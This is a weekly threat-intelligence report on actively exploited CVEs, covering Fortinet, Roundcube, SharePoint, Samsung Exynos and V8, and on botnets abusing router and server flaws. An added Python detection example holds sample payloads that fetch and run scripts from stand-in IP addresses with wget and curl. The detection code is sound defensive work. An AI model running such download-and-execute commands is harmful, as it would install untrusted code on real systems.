Surge in Cyber Threats: UNC5820 and Lazarus Group Exploited Critical Vulnerabilities

October 25, 2024
Executive Summary
Trending / Critical Vulnerabilities
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Vulnerabilities abused by Botnet
Vulnerabilities Abused by Malware
PRE-NVD observed for this week
External References

Executive Summary

This week, the CISA Known Exploited Vulnerabilities (KEV) catalog saw an expansion with the addition of five newly identified vulnerabilities impacting products from Cisco, Roundcube WebMail, ScienceLogic SL1 platform, Microsoft, and Fortinet.

The UNC5820 threat group is exploiting a cross-site scripting vulnerability in Fortinet's FortiManager, drawing attention to significant security risks. Simultaneously, Google has alerted users about vulnerabilities in Samsung mobile processors that are actively being exploited. Furthermore, the notorious Lazarus Group from North Korea has been attributed with exploiting a recently patched zero-day vulnerability in Google software.

Additionally, there has been a marked increase in the activity of the Mirai botnet, which has intensified its attacks on TP-Link Archer AX21 routers, highlighting its ongoing targeting of consumer devices. The Sysrv and Enemy botnets have also been exploiting vulnerabilities in Spring Cloud Gateway, broadening their attack vectors. Meanwhile, the IoT_Reaper botnet continues to target a persistent vulnerability in MVPower CCTV DVR models, and Zerobot has been found exploiting a three-year-old vulnerability in the Apache HTTP server.

Trending / Critical Vulnerabilities

Current trending vulnerabilities offer insight into the latest emerging and widely discussed threats, helping defenders make informed decisions.

CVE-2024-20481 

A vulnerability in the Remote Access VPN (RAVPN) service of Cisco ASA and Firepower Threat Defense (FTD) Software could let unauthenticated attackers launch a denial-of-service (DoS) attack. Added to CISA’s Known Exploited Vulnerabilities (KEV) catalog, this zero-day flaw was exploited in a brute force password spraying attack in April before Cisco released a patch. 

CVE-2024-37383

A stored cross-site scripting (XSS) vulnerability in Roundcube Webmail, tracked as CVE-2024-37383, was exploited in a phishing campaign targeting government organizations in June 2024. Threat actors used seemingly empty emails containing hidden JavaScript payloads to steal credentials from Roundcube users. This vulnerability has also been added to the CISA Known Exploited Vulnerabilities (KEV) catalog recently.

CVE-2024-9537

A critical remote code execution (RCE) vulnerability with a CVSS score of 9.8 has been identified in the ScienceLogic SL1 platform, potentially allowing unauthorized access to its internal performance reporting systems. Rackspace confirmed to Bleeping Computer that this flaw was actively exploited as a zero-day by unknown threat actors. In response to the heightened risk, this vulnerability has also been added to the CISA Known Exploited Vulnerabilities (KEV) catalog.

CVE-2024-38094 

A new vulnerability, CVE-2024-38094, with a CVSS score of 7.2, has been identified in Microsoft SharePoint Server and was recently added to the CISA Known Exploited Vulnerabilities (KEV) catalog. According to Microsoft, an authenticated attacker with Site Owner permissions can exploit this deserialization vulnerability to inject and execute arbitrary code within the SharePoint environment.

CVE-2024-44068

Google's Threat Analysis Group (TAG) has flagged a critical zero-day vulnerability, CVE-2024-44068, affecting Samsung's mobile processors—specifically Exynos 9820, 9825, 980, 990, 850, and W920. The flaw, which has a CVSS score of 8.1, is being exploited in the wild as part of an attack chain enabling arbitrary code execution. Samsung addressed the issue with security patches released in their October 2024 updates.

Exploit Activity and Mass Scanning Observed on Cytellite Sensors

Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.

Vulnerability | Product | Severity | Title | Exploited in the wild | CISA KEV
--- | --- | --- | --- | --- | ---
CVE-2024-4577 | PHP-CGI on Windows | High | Critical argument injection vulnerability in PHP on Windows servers | True | True
CVE-2023-26801 | LB-LINK | Critical | Command injection vulnerability in LB-LINK devices | True | False
CVE-2023-38646 | Metabase open source and Metabase Enterprise | Critical | Remote code execution vulnerability in Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 | True | True
CVE-2023-1389 | TP-Link Archer AX-21 | High | Command injection vulnerability in TP-Link Archer AX-21 | True | True
CVE-2022-41040 | Microsoft Exchange Server | High | Server-side request forgery vulnerability in Microsoft Exchange Server | True | True
CVE-2022-30489 | Wavlink Devices | Medium | Cross-site scripting vulnerability in Wavlink devices | False | False
CVE-2022-25168 | Apache Hadoop | Critical | Command injection vulnerability in org.apache.hadoop.fs.FileUtil.unTarUsingTar in Apache Hadoop | False | False
CVE-2022-22947 | Spring Cloud Gateway | Critical | Remote code execution vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ | True | True
CVE-2022-30023 | Tenda Devices | High | Command injection vulnerability via the Ping function in Tenda products | False | False
CVE-2022-34045 | Wavlink Devices | Critical | Hardcoded encryption/decryption key vulnerability in Wavlink | False | False

Vulnerabilities abused by Botnet

This section lists vulnerabilities exploited by botnets, including recent CVEs logged in MISP. It presents the top 5 CVEs whose payloads are suggestive of botnet activity, such as the use of wget with raw IP addresses.

Vulnerability | Product | Title | Exploit | Abused by Botnet
--- | --- | --- | --- | ---
CVE-2023-26801 | LB-LINK BL Devices | Command injection vulnerability in LB-LINK BL-AC1900_2.0 1.0.1, BL-WR9000 2.4.9, BL-X26 1.2.5, and BL-LTE300 1.0.8 | True | Mirai
CVE-2021-41773 | Apache HTTP Server | Path traversal vulnerability in Apache HTTP Server | True | Zerobot
CVE-2016-20016 | MVPower CCTV DVR models | Remote code execution vulnerability in MVPower CCTV DVR models | True | IoT_Reaper
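As an added illustration of the heuristic described above (this is example code, not the report's own tooling), the following Python block flags sensor hits whose payload fetches a file from a bare IPv4 address with wget or curl, then ranks the tagged CVEs by count; the hits are constructed samples, not real telemetry.

```python
import re
from collections import Counter
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample sensor hits (CVE tag, request payload); not real telemetry.
SAMPLE_HITS: List[Tuple[str, str]] = [
    ("CVE-2023-26801", "cmd=;wget http://192.0.2.10/bins/x.sh -O /tmp/x;sh /tmp/x"),
    ("CVE-2023-26801", "cmd=;curl http://198.51.100.7/arm7 -o /tmp/a"),
    ("CVE-2021-41773", "echo;wget%20http://203.0.113.5/z"),
    ("CVE-2016-20016", "shell?wget%20http%3A%2F%2F192.0.2.10%2Fmvp.sh"),
    ("CVE-2022-22947", "filters: whoami"),
    ("CVE-2024-4577", "wget http://example.invalid/notes.txt"),
]

# wget/curl followed, within the same shell command, by an http(s) URL
# whose host is a dotted quad; hostname URLs deliberately do not match.
LOADER_RE = re.compile(
    r"\b(wget|curl)\b[^;|&\n]*?https?://(\d{1,3}(?:\.\d{1,3}){3})",
    re.IGNORECASE,
)


def loader_ip(payload: str) -> Optional[str]:
    """Return the raw IPv4 host a wget/curl in the payload downloads from, else None."""
    text = unquote(payload)  # undo URL-encoding such as %20 and %2F first
    for m in LOADER_RE.finditer(text):
        ip = m.group(2)
        if all(int(octet) <= 255 for octet in ip.split(".")):
            return ip
    return None


def botnet_candidates(hits: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """(cve, ip) for every hit whose payload fetches a loader from a bare IP."""
    return [(cve, ip) for cve, payload in hits if (ip := loader_ip(payload))]


def top_cves(hits: List[Tuple[str, str]], n: int = 5) -> List[Tuple[str, int]]:
    """Rank CVEs by count of botnet-style hits, the report's 'top N' view."""
    return Counter(cve for cve, _ in botnet_candidates(hits)).most_common(n)


if __name__ == "__main__":
    for cve, ip in botnet_candidates(SAMPLE_HITS):
        print(f"{cve}: loader fetched from {ip}")
    print("top CVEs:", top_cves(SAMPLE_HITS))
```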

Vulnerabilities Abused by Malware

We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.

CVE-2024-47575

A critical missing authentication vulnerability has been discovered in the Fortinet FortiManager fgfmd daemon, which enables remote unauthenticated attackers to execute arbitrary code or commands via specially crafted requests. Investigations by Mandiant revealed the existence of a new threat cluster, designated UNC5820, that has been actively exploiting this vulnerability since June 27, 2024. Additionally, this flaw has recently been included in CISA's Known Exploited Vulnerabilities (KEV) catalog. 

CVE-2024-4947

A Type Confusion vulnerability in the V8 JavaScript engine has been discovered, potentially enabling remote code execution attacks. Kaspersky has identified the Lazarus Group, a North Korean cyber threat actor, as responsible for exploiting this zero-day vulnerability. The vulnerability, which has now been patched, allowed attackers to gain unauthorized access and control over compromised systems.

Vulnerability | Severity | Title | Patch | Targeted By Malware | OSS
--- | --- | --- | --- | --- | ---
CVE-2024-47575 | Critical | Critical missing authentication vulnerability in Fortinet FortiManager | True | UNC5820 | False
CVE-2024-4947 | High | Type confusion vulnerability in the V8 JavaScript engine | True | Lazarus Group | True

PRE-NVD observed for this week

PRE-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

CVE-ID | Type of Vulnerability | Product | Reference
--- | --- | --- | ---
CVE-2024-7952 | Sensitive Information Disclosure | DataEdgePlatform DataMosaix Private Cloud 7.07 and earlier | Resource
CVE-2024-9252 | Use-After-Free | Foxit PDF Reader | Resource
CVE-2024-0119 | Out of Bounds Read | NVIDIA D3D10 Driver | Resource
CVE-2024-0120 | Out of Bounds Read | NVIDIA D3D10 Driver | Resource
CVE-2024-0121 | Out of Bounds Read | NVIDIA D3D10 Driver | Resource

External References
